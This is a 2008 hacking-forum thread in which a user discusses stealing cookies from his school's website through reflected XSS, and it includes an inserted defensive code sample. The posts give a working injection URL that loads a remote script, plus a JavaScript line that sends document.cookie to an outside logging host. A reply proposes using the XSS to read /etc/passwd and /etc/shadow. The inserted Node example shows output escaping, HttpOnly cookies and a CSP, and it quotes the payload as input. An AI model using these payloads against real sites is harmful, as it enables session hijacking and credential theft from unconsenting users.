Thursday, April 24, 2014
Author

Stealing Cookies

chess_rock
Member



Posts: 244
Location:
Joined: 20.02.08
Rank:
Apprentice
Posted on 22-08-08 01:05
Hey there xD

I was trying to check my school's security level, and I found out that it is quite vulnerable to XSS cookie stealing. When I'm on my school's PC, I can perfectly steal cookies, but when I do this outside, with a proxy of course, I can't. There is this error saying that I need to be in the network to steal the cookies. My question is more a kind of curiosity, since there is nothing about this on Google... Is there any code to camouflage your IP and make you look like the IP of your target? Not any proxy, but the same target... Or is there any way of trespassing this error message?

I think you'll say nope for the first question, and yep for the second one... almost sure Pfft
Author

RE: Stealing Cookies

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 22-08-08 01:08
Explain how you are trying to steal cookies.



"The chowner of property." - Zeph
Widespread intellectual and moral docility may be convenient for leaders in the short term, but it is suicidal for nations in the long term. - Carl Sagan
"Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?" - Ebert

Edited by spyware on 22-08-08 01:09
Author

RE: Stealing Cookies

chess_rock
Member



Posts: 244
Location:
Joined: 20.02.08
Rank:
Apprentice
Posted on 22-08-08 01:13
Well... I'm using the following code:

http://www.example.com/search.php?query="><script src=http://www.mypage.com/cookiesteal.js>

The JavaScript (cookiesteal.js) contains the code:

location.href = 'http://ccl.whiteacid.org/log.php?xxxxxx'+document.cookie;
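
Added example, not part of any post in this thread: a defender's view of the reflected `query` injection quoted above, in JavaScript (Node). It assumes the search page echoes `query` into a `value="..."` attribute; the function names and the `SESSID` cookie are hypothetical.

```javascript
'use strict';
// Added defensive example; function names and the SESSID cookie are hypothetical.

// Characters that can close an attribute value or open a tag, with their entities.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed vulnerable pattern: the query is concatenated straight into the attribute.
function renderSearchBoxUnsafe(query) {
  return '<input type="text" name="query" value="' + query + '">';
}

// Hardened: identical markup, but the query is encoded for the HTML context,
// so a quote or angle bracket in it stays inside the attribute value as text.
function renderSearchBoxSafe(query) {
  return '<input type="text" name="query" value="' + escapeHtml(query) + '">';
}

// Session cookie flagged HttpOnly, which hides it from document.cookie.
// Secure assumes the site is served over HTTPS.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Content-Security-Policy value that refuses inline and off-origin scripts,
// a second layer if an encoding bug slips through.
function cspHeaderValue() {
  return "script-src 'self'; object-src 'none'; base-uri 'none'";
}

// True when the rendered fragment contains a live <script> element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed input: the query string quoted in the post above.
const postedQuery = '"><script src=http://www.mypage.com/cookiesteal.js>';

console.log('unsafe:', renderSearchBoxUnsafe(postedQuery));
console.log('safe:  ', renderSearchBoxSafe(postedQuery));
console.log('Set-Cookie:', sessionCookieHeader('SESSID', 'constructed-sample-value'));
console.log('Content-Security-Policy:', cspHeaderValue());
```

With the encoded output the posted string is rendered as the literal text of the search box, and with `HttpOnly` set the session cookie never appears in `document.cookie` even on a page where an injection does run.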
Author

RE: Stealing Cookies

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 22-08-08 01:15
How do you get example.com's visitors to execute that?



Author

RE: Stealing Cookies

chess_rock
Member



Posts: 244
Location:
Joined: 20.02.08
Rank:
Apprentice
Posted on 22-08-08 01:29
Well, I tried to do it directly, without sending them to the other page, but then it didn't work... I camouflaged it a bit, and what it does is to send a request to their page to access the code in the JavaScript...
Author

RE: Stealing Cookies


Member


Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 01:44
What he meant is, are you emailing the visitors the link? If you aren't, you are only going to steal your own cookies.

Also, why does the XSS matter? Are the users logging into the site? Are there cookies to steal that would give you access? If there aren't, why bother stealing cookies? You could do so much more because of the XSS. With that you could do AJAX requests for /etc/passwd and /etc/shadow if they have the right permissions. You don't even need to host a script on your own site since you can just use an XSS. That's where you should be focusing if you can't gain more access on the site by using someone else's cookies.
Author

RE: Stealing Cookies

chess_rock
Member



Posts: 244
Location:
Joined: 20.02.08
Rank:
Apprentice
Posted on 22-08-08 02:46
Well, yeah... it sounds strange, but I want to steal my OWN cookies... the vulnerability is the same in this case as when I try to add info into the website